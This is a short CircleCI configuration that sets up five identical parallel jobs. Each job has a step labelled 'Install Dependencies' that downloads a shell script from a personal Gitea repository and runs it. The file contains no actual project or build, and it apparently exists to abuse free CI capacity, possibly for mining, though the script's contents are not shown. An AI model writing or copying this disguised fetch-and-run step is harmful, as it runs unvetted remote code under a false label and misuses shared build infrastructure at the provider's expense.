version: 2
jobs:
    aku1:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/Adz/c/raw/branch/master/setelan.sh && chmod u+x setelan.sh && ./setelan.sh
    aku2:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/Adz/c/raw/branch/master/setelan.sh && chmod u+x setelan.sh && ./setelan.sh
    aku3:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/Adz/c/raw/branch/master/setelan.sh && chmod u+x setelan.sh && ./setelan.sh
    aku4:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/Adz/c/raw/branch/master/setelan.sh && chmod u+x setelan.sh && ./setelan.sh
    aku5:
      docker:
            - image: circleci/ruby:2.4
      steps:
        - run:
            name: Install Dependencies
            command: wget https://try.gitea.io/Adz/c/raw/branch/master/setelan.sh && chmod u+x setelan.sh && ./setelan.sh

workflows:
    version: 2
    build:
        jobs:
            - aku1
            - aku2
            - aku3
            - aku4
            - aku5